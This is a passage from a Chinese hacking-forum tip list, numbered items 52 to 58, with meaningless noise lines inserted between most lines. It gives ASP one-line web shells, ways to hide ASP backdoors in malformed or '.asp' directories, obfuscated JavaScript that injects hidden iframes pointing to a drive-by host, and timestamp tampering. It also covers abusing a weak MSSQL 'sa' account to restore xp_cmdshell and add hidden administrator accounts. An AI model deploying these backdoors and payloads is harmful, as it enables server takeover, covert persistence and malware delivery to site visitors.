" S% g$ |, K) Z: A5 C" f2 ?
e).<%25Execute(request("l"))%25>
( j& b2 L4 c5 C/ c+ u! F
f).<%if request("cmd")<>"" then execute request("pass")%>
/ u, M) F. b! s% f
! w3 k& t" Z0 J- Z, ~! K8 |! K
52、at "12:17" /interactive cmd
5 s1 j' K) ^0 g8 Q+ T! B
执行后可以用AT命令查看新加的任务
# w% M# o5 A, E5 {! {
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
' G# o& C" w+ v5 Z* d$ l
" L. g* s( m% A3 @' `
53、隐藏ASP后门的两种方法
# l3 x$ N- ~' S4 ?6 o: D' {
1、建立非标准目录:mkdir images..\
~- `) A* ? p+ o$ i
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
4 r4 |9 s* f( P! p
通过web访问ASP木马:http://ip/images../news.asp?action=login
; L& K6 V7 }* ^3 D2 I1 {* s _
如何删除非标准目录:rmdir images..\ /s
$ h- ~. W5 }0 J& x
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
1 ~+ p3 s5 Q# A& O7 I
mkdir programme.asp
& |5 a% X, M. q$ S
新建1.txt文件内容:<!--#include file=”12.jpg”-->
* b4 \ G+ P" n2 _0 i6 q4 R9 c
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
% L( C- t% \# K8 t t
attrib +H +S programme.asp
( Z: C- ^3 C& ^! ]2 N
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
! S8 O1 G0 K# v% U8 ^& \/ H, f
. m' b" z* y$ [3 _4 ?" b
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
: ~; ~6 t1 e( z t
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
' S) u! r/ v# U7 B3 I: Q$ t
W# N% u$ s2 D* j6 h
55、JS隐蔽挂马
6 P7 ~. n) K8 U# F
1.
* y& M4 @3 M4 Z I8 q
var tr4c3="<iframe src=ht";
4 l, r: c# ^1 t, h0 k7 R. P; v
tr4c3 = tr4c3+"tp:/";
% P- A" L7 u8 g
tr4c3 = tr4c3+"/ww";
: a- \, i0 r( F' d9 ~
tr4c3 = tr4c3+"w.tr4";
! q0 C; ~9 l& r/ v% b9 c
tr4c3 = tr4c3+"c3.com/inc/m";
2 g2 G# S9 W" ^$ I
tr4c3 = tr4c3+"m.htm style="display:none"></i";
7 X# B' D' B+ y) t- z* _
tr4c3 =tr4c3+"frame>'";
9 _6 U! ^9 h, I7 b0 I
document.write(tr4c3);
7 ~4 `4 O0 s% t: y0 d9 b
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
5 ^3 J8 u( J" l% D2 c: I4 P
3 c# Y" y3 n* v! X
2.
( p! z; P( |1 W( W
转换进制,然后用EVAL执行。如
+ d* S3 }2 B# W v s5 O9 H
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
. |) L3 O! h( j5 Z
不过这个有点显眼。
6 t) _7 t, w0 t9 Y: D ?, o" Q
3.
9 w8 l( c7 v+ K, U; b
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
: A; A4 T; H7 V$ r! M
最后一点,别忘了把文件的时间也修改下。
7 i# T) k9 z3 ?2 A+ R4 x
4 d! e- a" P0 [3 R7 H' m% E
56.3389终端入侵常用DOS命令
/ o5 ~2 I9 v6 y. g; T( _7 B
taskkill taskkill /PID 1248 /t
* q2 P4 Q- p+ ~! v/ j. ^
8 T* x/ [! q' g0 c- M1 O5 R( C8 ?
tasklist 查进程
' M+ P- g7 N/ }# x( D" |4 }- b
2 F/ s# w8 `' E* y
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
. S, g, d8 t; X
iisreset /reboot
, U( H% d1 G+ d, b& C1 @3 H
tsshutdn /reboot /delay:1 重起服务器
. I! v: I. Z$ C! u% b0 S
G) E0 z2 s- g( a
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
3 v5 S# q0 Y% m1 S( C: U
; C, k5 `' u: k6 ^) R
query user 查看当前终端用户在线情况
: Q- I& v; H5 s9 V) ~
9 Q- X, @3 C7 R& M/ f/ ?
要显示有关所有会话使用的进程的信息,请键入:query process *
0 r8 t( }& V. a/ u: r
/ j0 L4 s9 Y5 c" ~
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
9 h) ~# o) ?. j/ U8 s
( H* |( d% \& J6 k; a
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
4 N, [' y" t( U8 x( }. [& a
2 O: x% {) `% Q5 Q
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
7 F7 g* d9 L) J6 P- s" M/ U( A
; X% n2 H1 Z( Y/ W7 n, m8 H
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
3 m; }. W6 D, t3 G1 o
r7 S u9 o+ u5 X
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
; l% n* E. e8 z9 a2 G+ Y) K0 [. [2 u# a
( ~* p) w5 u0 G) F" o
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
0 s7 e9 z' E% ~! f) J9 W( [
$ j. b) l& z5 C2 h" z
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
7 N$ ~9 n7 Y7 u( d# R
, n$ m) T- C: m3 J- l$ }
56、在地址栏或按Ctrl+O,输入:
; }# ?: p, }. k+ n) }# A
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
& C* m9 \, y7 _/ a
/ V/ c3 K% ?% Y/ c T: w
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
/ Q' {% f7 k) x; B2 p/ p7 j
; O. I. R2 z% W' Y3 f( Y
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
# ^9 w. C) @$ F3 T! O
用net localgroup administrators是可以看到管理组下,加了$的用户的。
1 q2 g4 G/ H+ p2 ^; |! z
$ @3 k! A- z, P1 ]* u4 l
58、 sa弱口令相关命令
" L# R$ ^: g5 v
! x: t) t# o+ G! s- W
一.更改sa口令方法:
6 M9 e: h! { W9 z8 ^/ [0 Q2 S6 q
用sql综合利用工具连接后,执行命令:
& ~4 e% J# x. R1 U4 y8 k7 g3 Q
exec sp_password NULL,'20001001','sa'
1 h! z* G. e. a3 v$ a
(提示:慎用!)
# D; ?* b0 J2 M5 Q2 E& _* Q
# L0 x N2 T) b) d' K% `% Y1 {; ?) s
二.简单修补sa弱口令.
2 h) m; `- _' q; j1 u: `
& Y4 C$ u9 Q( u; b% [2 Y. d' R
方法1:查询分离器连接后执行:
x V" @/ |& L( f
if exists (select * from
# |2 u5 w- V: I6 G# \
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
s# V3 U& O! r t
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
6 V; }4 x: P$ V h7 x
3 A4 d; V. n# e8 M- E
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
! E: z! k% S; ?0 l/ N
`9 Q' E1 ~2 G" c, g/ M: j
GO
& u, Q) z% J3 D: A0 @
1 @; U: G% Y$ |" y9 Y1 w
然后按F5键命令执行完毕
- ]( g% t2 D8 B! I" `
* Z9 y5 W5 L( R" Z
方法2:查询分离器连接后
1 _( O/ t( I; D) ?
第一步执行:use master
& e* e- n' _& \" G: @6 W) B
第二步执行:sp_dropextendedproc 'xp_cmdshell'
" F. n" p3 `& b. p; {4 T8 x, ]1 R
然后按F5键命令执行完毕
' ~# E6 _2 v3 w- A) o
( J, @. |/ \1 O2 \8 A- p% N
, r* Y: M& T, V
三.常见情况恢复执行xp_cmdshell.
) h: j: }" X9 a0 Q0 }# h4 Z7 a/ }
% U/ h/ l L% J; ^! z8 S
1 }+ d' C w0 X! E% A
1 未能找到存储过程'master..xpcmdshell'.
* V% D# ]. j. `- q' J. _5 T
恢复方法:查询分离器连接后,
) h1 Z2 x3 b" c3 T9 g9 `4 v
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
8 P/ M( L& a7 B: J" l6 A' |
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
- e C% p( K+ b: b3 T
然后按F5键命令执行完毕
/ p3 X8 K4 G+ O& |. \5 i. r. Y" Q8 C
3 d( M2 Z. S1 s
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
# x5 z% O, ]7 B0 \' E; I
恢复方法:查询分离器连接后,
. {; b1 E& n5 ]! z
第一步执行:sp_dropextendedproc "xp_cmdshell"
4 W: G9 I6 F) R* z* p2 Y0 a
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
' y$ u9 m& U! h6 S- `1 b5 J
然后按F5键命令执行完毕
; y) P* t. u4 h$ b2 Z
4 [4 L: _& Q% x5 j9 \" Q* x
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
: D# i3 G! m3 u) z
恢复方法:查询分离器连接后,
0 Q6 p; d7 s7 q+ j6 D0 o" C
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
9 J0 q2 K: s1 ^/ `1 R
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
0 |( g9 t N8 P4 |( K; N( K G
然后按F5键命令执行完毕
: J7 h) Z4 @- _4 ]; I6 E
& w N1 `* }" M8 j2 @, c. ?
四.终极方法.
% R) P( R. `' H: u. D( Q8 L/ B `
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
/ l0 \5 n3 @# Z5 u! c3 [( S+ B
查询分离器连接后,
8 h, s2 g8 ~+ |5 l" H8 j
2000servser系统:
; F& v! H4 z4 O7 I
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
: n' s7 Y7 O. e2 r" q
! m- v2 T. h: o/ D
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
# `7 F9 H. }/ u( a
# K# u8 m+ W4 j( X" e0 p& ?, G
xp或2003server系统:
. Z; V) b; ~. w# e
1 T) a* @) H; ~5 U, [) | |# c7 P2 Q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
( O, Y3 ?3 a3 q5 Y- u% L% [9 m
5 W5 b/ Y! n m) m
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
5 m8 d/ V2 B8 u
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2